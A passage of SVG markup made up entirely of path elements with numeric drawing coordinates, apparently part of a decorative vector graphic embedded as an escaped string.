d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path 